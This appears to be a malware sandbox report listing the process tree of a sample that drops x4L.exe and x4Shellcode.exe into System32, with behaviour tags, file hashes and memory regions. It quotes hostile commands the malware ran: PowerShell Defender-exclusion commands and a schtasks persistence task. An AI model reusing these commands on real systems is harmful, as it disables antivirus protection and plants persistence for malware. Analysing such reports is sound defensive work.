C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"2⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\x4L.exe"C:\Windows\System32\x4L.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\x4Shellcode.exe"C:\Windows\System32\x4Shellcode.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DCF.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD565a68df1062af34622552c4f644a5708
SHA16f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA5124e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d
-
C:\Users\Admin\AppData\Local\Temp\tmp5DCF.tmp.batFilesize
160B
MD54799907eaba9b61384c6d41ac49a1f69
SHA13eb041560d4432e016f9aaf1cdb0972fef185095
SHA256f1cf95c41691f5f680a7fd3d9f67cf55210ee92460d96d3e76d7d1567a700e92
SHA51227e8729e7efa789b62aa411f880d4f2232eb8150a0c8db13e524ce5743f742f3e0deadbeec5e695db3a9937a71e9fc63aeca03e774e444c0fba87ee432bc3cea
-
C:\Windows\System32\x4L.exeFilesize
68KB
MD59ecdf1a7818f7e9952b6041e3aa19b7a
SHA193a8357036356c1c1e20a5cf69fdbad877ce8a0f
SHA2560771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
SHA512847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853
-
C:\Windows\System32\x4Shellcode.exeFilesize
164KB
MD58a7bee2c8cec6ac50bc42fe03d3231e6
SHA1ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA51234370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5
-
C:\Windows\Temp\__PSScriptPolicyTest_431fd2ss.jyr.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/384-98-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmpFilesize
64KB
-
memory/384-91-0x000001D99E600000-0x000001D99E62C000-memory.dmpFilesize
176KB
-
memory/384-97-0x000001D99E600000-0x000001D99E62C000-memory.dmpFilesize
176KB
-
memory/448-46-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/448-45-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/448-44-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/448-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/448-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/448-52-0x00007FFCE7ED0000-0x00007FFCE7F8E000-memory.dmpFilesize
760KB
-
memory/448-51-0x00007FFCE9970000-0x00007FFCE9B65000-memory.dmpFilesize
2.0MB
-
memory/448-53-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/616-58-0x000001AEC08A0000-0x000001AEC08CC000-memory.dmpFilesize
176KB
-
memory/616-64-0x000001AEC08A0000-0x000001AEC08CC000-memory.dmpFilesize
176KB
-
memory/616-65-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmpFilesize
64KB
-
memory/616-56-0x000001AEC0870000-0x000001AEC0896000-memory.dmpFilesize
152KB
-
memory/616-57-0x000001AEC08A0000-0x000001AEC08CC000-memory.dmpFilesize
176KB
-
memory/668-70-0x00000176F0FD0000-0x00000176F0FFC000-memory.dmpFilesize
176KB
-
memory/668-75-0x00000176F0FD0000-0x00000176F0FFC000-memory.dmpFilesize
176KB
-
memory/668-76-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmpFilesize
64KB
-
memory/740-102-0x0000025D6CD70000-0x0000025D6CD9C000-memory.dmpFilesize
176KB
-
memory/960-80-0x00000287A69C0000-0x00000287A69EC000-memory.dmpFilesize
176KB
-
memory/960-87-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmpFilesize
64KB
-
memory/960-86-0x00000287A69C0000-0x00000287A69EC000-memory.dmpFilesize
176KB
-
memory/2292-39-0x00000233FE240000-0x00000233FE262000-memory.dmpFilesize
136KB
-
memory/2292-42-0x00007FFCE7ED0000-0x00007FFCE7F8E000-memory.dmpFilesize
760KB
-
memory/2292-40-0x00000233FE570000-0x00000233FE59A000-memory.dmpFilesize
168KB
-
memory/2292-41-0x00007FFCE9970000-0x00007FFCE9B65000-memory.dmpFilesize
2.0MB
-
memory/4280-0-0x00007FFCCB6A3000-0x00007FFCCB6A5000-memory.dmpFilesize
8KB
-
memory/4280-28-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmpFilesize
10.8MB
-
memory/4280-2-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmpFilesize
10.8MB
-
memory/4280-1-0x0000000000860000-0x000000000089A000-memory.dmpFilesize
232KB
-
memory/4976-24-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmpFilesize
10.8MB
-
memory/4976-22-0x0000000000720000-0x0000000000738000-memory.dmpFilesize
96KB
-
memory/4976-890-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmpFilesize
10.8MB
-
memory/4976-891-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmpFilesize
10.8MB